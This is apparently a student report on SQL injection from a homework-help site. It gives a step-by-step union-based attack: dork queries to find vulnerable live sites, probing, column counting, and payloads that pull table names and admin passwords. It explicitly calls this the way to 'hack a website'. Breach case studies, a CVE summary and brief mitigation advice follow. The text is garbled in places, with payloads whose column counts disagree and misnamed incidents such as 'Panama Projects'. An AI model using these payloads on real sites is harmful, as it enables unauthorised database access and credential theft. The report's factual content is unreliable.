PricingBlogAbout Us

Computer Security Report: SQL Injection Techniques and Case Studies

Verified

Added on  2021/04/17

|14
|2569
|123
Report
AI Summary
This report provides a detailed analysis of SQL injection attacks, outlining the step-by-step procedures attackers use to exploit vulnerabilities in web applications. It explains how SQL injection operates, including the use of malicious SQL codes to manipulate database servers. The report covers various techniques, such as discovering vulnerable websites, checking for vulnerabilities, determining the number of columns, displaying vulnerable columns, and obtaining database information. It also examines real-world incidents, including attacks on e-commerce sites, security firms, and toy companies, highlighting the significant impact of these attacks. The report focuses on CVE-2010-2672, a specific vulnerability, and a case study involving a service provider in California, detailing the actions of attackers, the impact on customers, and the security breaches. Finally, the report suggests specific actions vendors should take to prevent future attacks, emphasizing the importance of implementing defensive measures and prioritizing data protection.
tabler-icon-diamond-filled.svg

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.
Document Page
Running head: COMPUTER SECURITY
Computer Security
Name of Student-
Name of University-
Author’s Note-
tabler-icon-diamond-filled.svg

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.
Document Page
1COMPUTER SECURITY
1.Details of SQL Injection and how it operates on real world
Procedure to perform the SQL injection:
The injection attack, generally takes place when the attacker executes harmful SQL codes
usually known as malicious payload is known as SQL Injection (Pawar, 2015). The SQL
Injection helps to control the database server of web application known as RDBMS (Relational
Database Management System). The vulnerability of SQL Injection generally affects the web
application or the website and make use of the database that is SQL-based. The vulnerability
done by SQL Injection is one of the most oldest method, and is considered as the most dangerous
attacks in the history of vulnerabilities of web application (Agrawal & Singh, 2017). With an
advanced SQL Injection vulnerability, and with right circumstances, the main motive of the
attacker is to bypass the authentication of web application as well as authorization of the
mechanism and then retrieve the whole content of the database.
Document Page
2COMPUTER SECURITY
Attacker
Victim’s Database
Posting malicious forms to the
victim’s server
Victim’s Server
Posting malicious forms to the
victim’s server
Valuable Data of the victim
The process of the SQL Injection attack can be explained with the help of the given
flowchart.
Figure 1: Flowchart for a SQL Injection Attacks
Document Page
3COMPUTER SECURITY
Step by step approach:
Step 1: Discovery of Vulnerable Website:
The first step is to find the venerable website. Google Dork list is widely used tool for the
hackers to find the venerable website (Pawar, 2015). There are various tricks to find the list, but
“inurl:” command very popular way to find the list.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:article.php?id=
The trick is to copy one of the above commands in the search bar and search for the
result. The results include a lot of websites that has vulnerability in terms of design and security.
Step 2: Check for the Vulnerability:
Once a vulnerability website is chosen from the list , the next step is to check and find the
vulnerability itself which can be done by including a single quote at the end of the URL of the
website like:
http://:www.abcd.com inurl:index.php?id=2’
In case the website remains in the same page or show some error message like page is
not found, then the website is not vulnerable(Agrawal & Singh, 2017).
tabler-icon-diamond-filled.svg

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.
Document Page
4COMPUTER SECURITY
Step 3: check for the Number of columns:
The number of the column of the database can be checked by adding the“order by n
statement at the end of the URL by replacing the single quote. . In case the value of n exceeds
the actual number of columns, then an error message will be shown like(Geneiatakis, 2015):
“http://www.abcd.com/index.php?id=2 order by 8(error)”
The value for which the error message is shown, the number of columns is one less than
that number. In this example the number of columns is 7.
In case the above method does not work then the alternative method is to add “-” at the
end of the URL, for example:
“http://www.abcd.com/index.php?id=2 order by 1- -”
Step 4: Displaying Vulnerable columns:
With the help of the “union select columns sequence” the vulnerable part of the table
can be found. The “order by n” command must be changed with this statement. The command
for 8 no of columns is as follows:
http://www.abcd.com/index.php?id= -2 union select 1,2,3,4,5,6,7, 8- -
The alternative method is:
http://www.abcd.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7, 8- -
Document Page
5COMPUTER SECURITY
the result will show some number in the search page like 1, 2, 3,4, 5 and from the number
one number has to be chosen like in this case number 2 is chosen for the example. The number is
necessary to proceed further with the method(Alwan & Younis, 2017).
Step 5: obtaining the version, database, and user:
Now the number 2 has to be replaced with the command “version()” like the following
http://www.abcd.com/index.php?id=-2 and 1=2 union select 1, version(),3 ,4,5,6,7- - and
some version number will like 4.0.2 or 5.3 or something like that will be shown.
Now the version() command needs to be replaced with “database()” and “user()” to find
information about the database and user respectively like:
“http://www.abcd.com/index.php?id=-2 and 1=2 union select 1,database(),4,5,6,7- -”
http://www.abcd.com/index.php?id=-2 and 1=2 union select 1,user(),3, 4,5,6,7- -”
Step 6: obtaining the Table Name:
In order to find the table name the number chosen in step 4 need to be replaced
with the command “group_concat(table_name)” and “from information_schema.tables”,where
“table_schema=database()” command needs to be added additionally(Som, Sinha & Kataria,
2016):
http://www.abcd.com/index.php?id=-2 and 1=2 union select
1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where
table_schema=database()- -”
Document Page
6COMPUTER SECURITY
It will show a lot of table names and from that the table related to the admin or user needs
to be selected.
Step 7: obtaining the column name:
Now “group_concat(table_name)” has to be replaced with the
“group_concat(column_name)” command. It will show the list of columns like
“admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas
s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password”.
Now the “group_concat(column_name)” command should be replaced with the
command“group_concat(columnname,0x3a,anothercolumnname)”.Column name needs
replacement from column name listed above. . The command “anothercolumnname” should be
replaced with the column name as well with column name listed:
“http://www.abcd.com/index.php?id=-2 and 1=2 union select
1,group_concat(admin_id,0x3a,admin_password),3, 4,5,6,7 from admin- -”
With the help of this method the user name and password can be found as well. In order
to obtain that the username and password column name needs to be used.
In order to hack a website and obtain information about the data base these steps need to
be followed properly and the steps has to be performed in the proper sequence as mentioned.
tabler-icon-diamond-filled.svg

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
Document Page
7COMPUTER SECURITY
Fig2: Work flow diagram of SQL injection to database
Document Page
8COMPUTER SECURITY
Some real life incidents of SQL Injections are:
An example of the e-commerce search form is taken into account. A user has the right to
ask site return list of the Samsung TV that were sold at some particular price (Geneiatakis,
2015). Second attack that took place with SQL Injections occurred in 2011. The SQL attack
occured with the hack of the security firm HB Gary Federal, allowed all the Anonymous
members to steal the passwords of the company (Sonoda, Matsuda & Koizumi, 2016). Third
attack for SQL Injections occurred in a Chinese company of toy known as VTE. Almost about
data of 4.8 million parents including 200,000 children’s data were stolen from the database of the
company. The method that was used to hack the data of VTE was similar to the hacking method
of Albert Gonzalez that was used to hack the Hannaford Brothers, 7-Eleven and many others to
steal the credit card numbers and the debit card numbers of the users (Pawar, 2015).
Another attack that took place with the SQL Injections was in Mossack Fonseca, the
Panamanian Law firm. This company was the source of Panama Projects, which has leaked the
papers by an SQL Injection vulnerable in the company (Geneiatakis, 2015).
Figure 2: Industries that are Targeted by SQL Injections
Document Page
9COMPUTER SECURITY
(Source: Geneiatakis, 2015)
In the above figure, different kinds of industries affected by the SQL Injections attacks
have been shown. It can be observed that the financial organizations are mostly affected by this
attack.
2. Common Vulnerabilities and Exposure (CVE) of SQL Injection and Real
world example
The selected CVE for this paper is CVE-2010-2672 (CVE -CVE-2010-2672, 2018). This
CVE is Multiple SQL injection vulnerabilities, which allows remote attackers to execute
arbitrary SQL commands via the (1) SectionID and (2) SearchTimestamp parameters to the
search feature and the (3) SearchContentClassAttributeID parameter to the advancedsearch
feature (Naderi-Afooshteh et al., 2015).The real life example of SQL injection attack using this
CVE was Sebastian, which is a service provider for phone, TV, and Internet in California.
a. The outcome of the attack was almost 100,000 $ was stolen from the accounts of the
customers online whose account details were taken from database of the company. Group of
hackers, who was known to be TeamBerserk held the attack for the company stealing almost all
the credentials from Sebastian (Hilbrich, Frank & Lehrig, 2016). The attackers has copied all the
credentials of the database account of Sebastian into their Gmail and got hold of their data. The
data that were stolen were the email ids of the customer, passwords, phone number, and even
credit card numbers from the database. The attackers, TeamBerserk twitted on Twitter that they
have performed a SQL Injection attacking the passwords and the usernames of the customers in
Sebastian. After the data breach, the hackers tweeted a 20-minute video representation that
archives the attack (Steimle et al., 2015). The attackers also took the list of usernames and the
passwords of the customers who uses different passwords for all the websites.
tabler-icon-diamond-filled.svg

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.
Document Page
10COMPUTER SECURITY
b. The impact of the attack that took place in Sebastian is that the customers lost almost
about 100,000 $ from the accounts numbers that were taken from the database of the company.
The names of the victim were such from the data that were breached, and if the data was found,
the bank details and the other credentials were taken getting some amount of money from the
account.
Figure 1:Procedure of SQL Injections
(Source: Hilbrich, Frank & Lehrig, 2016)
c. The aim of security that was breached was to steal the credential of all the customers
involved in Sebastian Company (Hochreiner et al., 2014). The mission of the company was to
provide security to all the customers who were involved with them and protect their credentials
from all the cyber risks. The main aim of the security was to take all the bank account details of
the customers to gain the amount of money from the customers. Almost about 100,000 $ was
stolen from the customers which lead to great loss of the company.
d. The specific actions that should have taken by the vendor of Sebastian to stop the
attack are to mitigate the further attacks that will take place in future (Alwan& Younis, 2017). To
protect the sensitive data should be the highest priority and should be served as the priority. They
Document Page
11COMPUTER SECURITY
should implement the checklist audit process or some vulnerable scan in the company. The
vendor of Sebastian should implement a defensive approach to the cyber-threat that come to the
company.
Document Page
12COMPUTER SECURITY
References
Agrawal, S., & Singh, U. (2017). Prevention of sql injection attack in web application with host
language.
Alwan, Z. S., & Younis, M. F. (2017). Detection and Prevention of SQL Injection Attack: A
Survey.
CVE -CVE-2010-2672. (2018). Cve.mitre.org. Retrieved 10 April 2018, from
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2672
Geneiatakis, D. (2015, December). Minimizing databases attack surface against SQL injection
attacks. In International Conference on Information and Communications Security (pp. 1-
9). Springer, Cham.
Hilbrich, M., Frank, M., & Lehrig, S. (2016). Security Modeling with Palladio—Different
Approaches. In Proceedings of the Symposium on Software Performance (pp. 7-9).
Hochreiner, C., Ma, Z., Kieseberg, P., Schrittwieser, S., & Weippl, E. (2014, April). Using
model driven security approaches in web application development. In Information and
Communication Technology-EurAsia Conference (pp. 419-431). Springer, Berlin,
Heidelberg.
Naderi-Afooshteh, A., Nguyen-Tuong, A., Bagheri-Marzijarani, M., Hiser, J. D., & Davidson, J.
W. (2015, June). Joza: Hybrid taint inference for defeating web application sql injection
attacks. In Dependable Systems and Networks (DSN), 2015 45th Annual IEEE/IFIP
International Conference on (pp. 172-183). IEEE.
tabler-icon-diamond-filled.svg

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
Document Page
13COMPUTER SECURITY
Pawar, R. G. (2015). SQL Injection Attacks. KHOJ: Journal of Indian Management Research
and Practices, 125-129.
Som, S., Sinha, S., & Kataria, R. (2016). Study on sql injection attacks: Mode detection and
prevention. International Journal of Engineering Applied Sciences and Technology,
Indexed in Google Scholar, ISI etc., Impact Factor: 1.494, 1(8), 23-29.
Sonoda, M., Matsuda, T., & Koizumi, D. (2016, October). On the approximate maximum
likelihood estimation in stochastic model of SQL injection attacks. In Systems, Man, and
Cybernetics (SMC), 2016 IEEE International Conference on(pp. 000802-000807). IEEE.
Steimle, F., Wieland, M., Mitschang, B., Wagner, S., & Leymann, F. (2015). Design and
implementation issues of a secure cloud-based health data management system.
In Proceedings of the 9th Symposium and Summer School On Service-Oriented
Computing. Technical Paper, vol. RC25564(pp. 68-82).
chevron_up_icon
1 out of 14
circle_padding
hide_on_mobile
zoom_out_icon
logo.png

Your All-in-One AI-Powered Toolkit for Academic Success.

  +13062052269
info@desklib.com

Available 24*7 on WhatsApp / Email

[object Object]
Unlock your academic potential

© 2024   |   Zucol Services PVT LTD   |   All rights reserved.